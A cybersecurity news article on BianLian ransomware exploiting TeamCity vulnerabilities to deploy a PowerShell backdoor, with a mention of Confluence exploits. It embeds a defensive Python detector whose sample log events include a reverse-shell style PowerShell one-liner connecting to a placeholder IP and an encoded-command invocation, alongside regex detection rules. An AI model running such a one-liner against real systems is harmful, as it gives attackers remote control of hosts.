Threat actors behind the BianLian ransomware have been observed to exploit security flaws in JetBrains TeamCity software to conduct their extortion-only attacks.
According to a new report from GuidePoint Security, which responded to a recent intrusion, the incident “began with the exploitation of a TeamCity server that led to the deployment of a PowerShell implementation of BianLian’s Go backdoor.”
BianLian emerged in June 2022 and has since focused exclusively on exfiltration-based extortion following the release of a decryptor in January 2023.
The attack chain observed by the cybersecurity firm involves exploiting a vulnerable TeamCity instance via CVE-2024-27198 or CVE-2023-42793 to gain initial access to the environment, followed by the creation of new users on the build server and the execution of malicious commands for post-exploitation and lateral movement.
It is currently unclear which of the two flaws was used as a weapon by the threat actor for the infiltration.
BianLian actors are known to implant a custom Go backdoor tailored to each victim, as well as to deploy remote desktop tools such as AnyDesk, Atera, SplashTop, and TeamViewer. The backdoor is tracked by Microsoft as BianDoor.
“After numerous failed attempts to run the standard Go backdoor, the threat actor pivoted to living off the land and leveraged a PowerShell implementation of the backdoor, which provides nearly identical functionality to what they would have with the Go backdoor,” said security researchers Justin Timothy, Gabe Renfro and Keven Murphy.
The obfuscated PowerShell backdoor (“web.ps1”) is designed to establish a TCP socket for additional network communications with an actor-controlled server, allowing remote attackers to conduct arbitrary actions on an infected host.
“The now confirmed backdoor is capable of communicating with the [command-and-control] server and executed asynchronously based on the remote attacker’s post-exploitation objectives,” the researchers said.
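A defender-side illustration, added here and not part of GuidePoint's report: a small Python scorer run over constructed PowerShell script-block log events (Event ID 4104 style) that flags the traits described above (TCP socket setup, asynchronous execution, the web.ps1 name). The rule weights, the extra obfuscation heuristics and every sample event are assumptions, not indicators from the incident.

```python
import re

# Constructed sample PowerShell script-block events (Windows Event ID 4104 style).
# Illustrative only; none of this is telemetry from the GuidePoint incident.
SAMPLE_EVENTS = [
    {"id": 1, "path": r"C:\TeamCity\work\web.ps1",
     "text": "$c=New-Object System.Net.Sockets.TCPClient('203.0.113.10',443);$s=$c.GetStream();"
             "while($true){$d=[IO.StreamReader]::new($s).ReadLine();Start-Job{IEX $using:d}}"},
    {"id": 2, "path": r"C:\Ops\backup.ps1",
     "text": "Get-ChildItem C:\\Backups | Compress-Archive -DestinationPath D:\\bk.zip"},
    {"id": 3, "path": r"C:\Users\svc\run.ps1",
     "text": "powershell.exe -nop -w hidden -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAApAA=="},
]

# Each rule: (name, compiled regex, weight). Weights are an assumed heuristic;
# a single weak signal should not page anyone, a socket plus eval should.
RULES = [
    ("tcp_socket", re.compile(r"Net\.Sockets\.TcpClient", re.I), 3),
    ("async_exec", re.compile(r"\b(Start-Job|Start-ThreadJob|BeginInvoke)\b", re.I), 1),
    ("dynamic_eval", re.compile(r"\b(IEX|Invoke-Expression)\b", re.I), 2),
    ("encoded_cmd", re.compile(r"-(enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), 2),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I), 1),
    ("known_name", re.compile(r"(^|[\\/])web\.ps1$", re.I), 2),  # matched against path
]
THRESHOLD = 3

def score_event(event):
    """Return (score, [matched rule names]) for one script-block event."""
    hits, score = [], 0
    for name, rx, weight in RULES:
        target = event["path"] if name == "known_name" else event["text"]
        if rx.search(target):
            hits.append(name)
            score += weight
    return score, hits

def find_suspicious(events, threshold=THRESHOLD):
    """Return ids of events whose cumulative score meets the threshold."""
    return [e["id"] for e in events if score_event(e)[0] >= threshold]

if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print(e["id"], score_event(e))
    print("suspicious:", find_suspicious(SAMPLE_EVENTS))  # [1, 3]
```

Event 2 stays below the threshold, while event 3 is flagged only because two weak signals combine; tune the weights against your own baseline of legitimate scripts.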
The disclosure comes after VulnCheck detailed new proof-of-concept (PoC) exploits for a critical security flaw impacting Atlassian Confluence Data Center and Confluence Server (CVE-2023-22527) that could lead to fileless remote code execution and load the Godzilla web shell directly in memory.
Over the past two months, the flaw has been weaponized to deploy C3RB3R ransomware, cryptocurrency miners, and remote access Trojans, indicating widespread exploitation in the wild.
“There’s more than one way to get to Rome,” noted VulnCheck’s Jacob Baines. “While using freemarker.template.utility.Execute appears to be the most popular way to exploit CVE-2023-22527, other, more hidden paths generate different indicators.”